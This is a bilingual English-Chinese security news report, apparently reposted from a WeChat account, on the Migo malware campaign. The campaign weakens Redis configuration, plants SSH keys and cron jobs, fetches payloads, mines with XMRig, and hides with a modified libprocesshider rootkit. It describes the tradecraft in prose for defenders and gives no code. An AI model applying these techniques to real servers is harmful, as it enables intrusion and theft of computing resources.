针对Redis服务器的加密货币挖矿新病毒

A novel malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.

观察到一种新型的恶意软件攻击，以获取对Redis服务器的初始访问权限，最终目标是在受感染的Linux主机上进行加密货币挖矿。

"This particular campaign involves the use of a number of novel system weakening techniques against the data store itself," Cado security researcher Matt Muir said in a technical report.

“这次特别的攻击涉及对数据存储本身使用一些新颖的系统削弱技术，” Cado安全研究员Matt Muir在一份技术报告中说。

The cryptojacking attack is facilitated by a malware codenamed Migo, a Golang ELF binary that comes fitted with compile-time obfuscation and the ability to persist on Linux machines.

加密货币挖矿攻击是由一种名为Migo的恶意软件执行的，它是一个Golang ELF二进制文件，具有编译时混淆和在Linux机器上持久存在的能力。

The cloud security company said it detected the campaign after it identified an "unusual series of commands" targeting its Redis honeypots that are engineered to lower security defenses by disabling the following configuration options -

云安全公司表示，在识别到针对其Redis诱饵的"异常系列命令"后，它检测到了这次攻击，这些命令旨在通过禁用以下配置选项降低安全防御：

• protected-mode

• replica-read-only

• aof-rewrite-incremental-fsync, and

• rdb-save-incremental-fsync

It's suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention.

有人怀疑这些选项被关闭是为了从外部网络向Redis服务器发送额外的命令，并在不引起太多注意的情况下促使未来的利用。

This step is then followed by threat actors setting up two Redis keys, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the malicious primary payload from a file transfer service named Transfer.sh, a technique previously spotted in early 2023.

然后，威胁行为者设置了两个Redis密钥，一个指向受攻击者控制的SSH密钥，另一个指向从名为Transfer.sh的文件传输服务中检索恶意主要载荷的cron作业，这是在2023年初曾被发现的一种技术。

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that's, in turn, obtained using a curl or wget command.

使用curl或wget命令在Pastebin文件中嵌入获取Migo的shell脚本，后者是通过一个先前在2023年初发现的技术获取的。

The Go-based ELF binary, besides incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It's also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

除了包含抵抗逆向工程的机制外，这个基于Go的ELF二进制文件还充当XMRig安装程序的下载器，托管在GitHub上。它还负责执行一系列步骤以建立持久性，终止竞争对手的挖矿程序，并启动挖矿操作。

On top of that, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version ("libsystemd.so") of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.

此外，Migo禁用Security-Enhanced Linux（SELinux），并搜索来自云提供商（如Qcloud和阿里巴巴云）计算实例中捆绑的监视代理的卸载脚本。它还部署了一个名为libprocesshider的受欢迎用户模式Rootkit的修改版本（"libsystemd.so"），用于隐藏进程和磁盘上的文件。

It's worth pointing out that these actions overlap with tactics adopted by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.

值得指出的是，这些行动与已知的加密货币挖矿组织，如TeamTNT，WatchDog，Rocke以及与SkidMap恶意软件相关的威胁行为者采用的策略重叠。

"Interestingly, Migo appears to recursively iterate through files and directories under /etc," Muir noted. "The malware will simply read files in these locations and not do anything with the contents."

"有趣的是，Migo似乎会递归遍历/ etc目录下的文件和目录，"Muir指出。"恶意软件将简单地读取这些位置的文件，并对内容不进行任何操作。"

"One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification."

"有一个理论是，这可能是一种（弱）尝试通过执行大量良性操作来混淆沙箱和动态分析解决方案，从而导致非恶意分类。"

Another hypothesis is that the malware is looking for an artifact that's specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

另一种假设是，恶意软件正在寻找特定于目标环境的工件，尽管Cado表示没有找到支持这种推理的证据。

"Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services," Muir said.

"Migo表明，以云为重点的攻击者正在不断改进他们的技术，提高利用面向面向Web的服务的能力，"Muir表示。

"Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves."

"尽管libprocesshider经常被加密货币挖矿活动使用，但这个特定的变体包括隐藏磁盘上的工件以及恶意进程本身的能力。"

原文始发于微信公众号（知机安全）：针对Redis服务器的加密货币挖矿新病毒